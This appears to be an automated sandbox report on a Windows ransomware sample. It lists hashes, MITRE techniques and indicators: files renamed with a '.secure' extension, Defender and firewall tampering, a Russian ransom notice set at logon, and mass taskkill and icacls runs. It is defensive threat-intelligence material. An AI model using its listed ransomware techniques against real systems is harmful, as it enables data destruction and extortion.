2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
154s
max time network
63s
platform
windows7_x64
resource
win7v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Size

353KB
MD5

3de060c1a25fb75735767e9450ed797d
SHA1

8c0e899fc89aa8e0201aa8ee4ba41cd05702116e
SHA256

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698
SHA512

4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 18 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\BackupTrace.tif.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\RevokeEdit.crw => C:\Users\Admin\Pictures\RevokeEdit.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\RevokeEdit.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\AddGroup.png.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\PopShow.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\UnprotectBackup.crw => C:\Users\Admin\Pictures\UnprotectBackup.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\PopShow.crw => C:\Users\Admin\Pictures\PopShow.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\AddGroup.png => C:\Users\Admin\Pictures\AddGroup.png.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\BackupTrace.tif => C:\Users\Admin\Pictures\BackupTrace.tif.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\ConfirmSet.tif => C:\Users\Admin\Pictures\ConfirmSet.tif.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\ConfirmSet.tif.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\MergeApprove.tiff	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\MergeApprove.tiff => C:\Users\Admin\Pictures\MergeApprove.tiff.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\MergeApprove.tiff.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\WatchPing.tiff	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File renamed	C:\Users\Admin\Pictures\WatchPing.tiff => C:\Users\Admin\Pictures\WatchPing.tiff.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\WatchPing.tiff.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
File opened for modification	C:\Users\Admin\Pictures\UnprotectBackup.crw.secure	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1728	icacls.exe
1940	icacls.exe
1844	icacls.exe
1976	icacls.exe
980	icacls.exe
1940	icacls.exe
1844	icacls.exe
828	icacls.exe
1836	icacls.exe
1500	icacls.exe
1088	icacls.exe
1804	icacls.exe
1912	icacls.exe
1368	icacls.exe
1804	icacls.exe
984	icacls.exe
884	icacls.exe
1584	icacls.exe
1580	icacls.exe
568	icacls.exe
1488	icacls.exe
1140	icacls.exe
620	icacls.exe
944	icacls.exe
1960	icacls.exe
1980	icacls.exe
1784	icacls.exe
1576	icacls.exe
1480	icacls.exe
1632	icacls.exe
1368	icacls.exe
1632	icacls.exe
1144	icacls.exe
1288	icacls.exe
1712	icacls.exe
796	icacls.exe
1568	icacls.exe
1912	icacls.exe
1352	icacls.exe
1808	icacls.exe
1708	icacls.exe
564	icacls.exe
1976	icacls.exe
328	icacls.exe
576	icacls.exe
1324	icacls.exe
408	icacls.exe
1768	icacls.exe
1768	icacls.exe
1804	icacls.exe
328	icacls.exe
1768	icacls.exe
1352	icacls.exe
1520	icacls.exe
1844	icacls.exe
1504	icacls.exe
1620	icacls.exe
1360	icacls.exe
1308	icacls.exe
1808	icacls.exe
1820	icacls.exe
1680	icacls.exe
1668	icacls.exe
1988	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!"	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - [email protected]\r\n\r\nХорошего и продуктивного дня!\r\n\r\n\r\n(с) Каждый человек — программист собственного счастья и хакер чужого."	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
532	taskkill.exe
1812	taskkill.exe
1088	taskkill.exe
1084	taskkill.exe
944	taskkill.exe
1616	taskkill.exe
916	taskkill.exe
1680	taskkill.exe
580	taskkill.exe
480	taskkill.exe
852	taskkill.exe
276	taskkill.exe
976	taskkill.exe
1816	taskkill.exe
1944	taskkill.exe
328	taskkill.exe
1988	taskkill.exe
1188	taskkill.exe
1772	taskkill.exe
1692	taskkill.exe
480	taskkill.exe
328	taskkill.exe
428	taskkill.exe
1496	taskkill.exe
1640	taskkill.exe
1800	taskkill.exe
1576	taskkill.exe
1776	taskkill.exe
1964	taskkill.exe
920	taskkill.exe
1524	taskkill.exe
1144	taskkill.exe
964	taskkill.exe
1000	taskkill.exe
1060	taskkill.exe
1592	taskkill.exe
1796	taskkill.exe
1804	taskkill.exe
1728	taskkill.exe
1972	taskkill.exe
1976	taskkill.exe
1760	taskkill.exe
1844	taskkill.exe
852	taskkill.exe
1300	taskkill.exe
1404	taskkill.exe
1484	taskkill.exe
1660	taskkill.exe
1692	taskkill.exe
1060	taskkill.exe
1608	taskkill.exe
980	taskkill.exe
1972	taskkill.exe
900	taskkill.exe
984	taskkill.exe
1072	taskkill.exe
576	taskkill.exe
576	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1480 reg.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

980 PING.EXE
1796 PING.EXE
1580 PING.EXE

pid	process
1480	reg.exe

pid	process
980	PING.EXE
1796	PING.EXE
1580	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

pid	process
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.exetaskkill.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	1072	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	428	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	1608	conhost.exe
Token: SeDebugPrivilege	1944	conhost.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	1084	taskkill.exe
Token: SeDebugPrivilege	964
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	980	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	1300	conhost.exe
Token: SeDebugPrivilege	276	taskkill.exe
Token: SeDebugPrivilege	1976	conhost.exe
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	976	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	328	taskkill.exe
Token: SeDebugPrivilege	480	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	580	taskkill.exe
Token: SeDebugPrivilege	900	taskkill.exe
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeDebugPrivilege	1772	conhost.exe
Token: SeDebugPrivilege	1804	conhost.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	920	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	480	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	1776	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

description	pid	process	target process
PID 280 wrote to memory of 1300	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 280 wrote to memory of 1300	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 280 wrote to memory of 1300	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 280 wrote to memory of 1784	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 280 wrote to memory of 1784	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 280 wrote to memory of 1784	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 280 wrote to memory of 328	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 328	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 328	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1620	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	reg.exe
PID 280 wrote to memory of 1620	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	reg.exe
PID 280 wrote to memory of 1620	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	reg.exe
PID 280 wrote to memory of 1480	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	reg.exe
PID 280 wrote to memory of 1480	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	reg.exe
PID 280 wrote to memory of 1480	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	reg.exe
PID 280 wrote to memory of 1760	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	schtasks.exe
PID 280 wrote to memory of 1760	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	schtasks.exe
PID 280 wrote to memory of 1760	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	schtasks.exe
PID 280 wrote to memory of 1572	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1572	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1572	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1684	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1684	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1684	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 944	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 944	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 944	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1732	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	netsh.exe
PID 280 wrote to memory of 1732	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	netsh.exe
PID 280 wrote to memory of 1732	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	netsh.exe
PID 280 wrote to memory of 900	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 900	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 900	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1084	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1084	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1084	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 428	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 428	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 428	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1772	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1772	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1772	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1092	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1092	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1092	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 280 wrote to memory of 1524	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1524	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1524	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1072	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1072	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1072	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1144	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1144	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1144	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 280 wrote to memory of 1816	280	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	netsh.exe
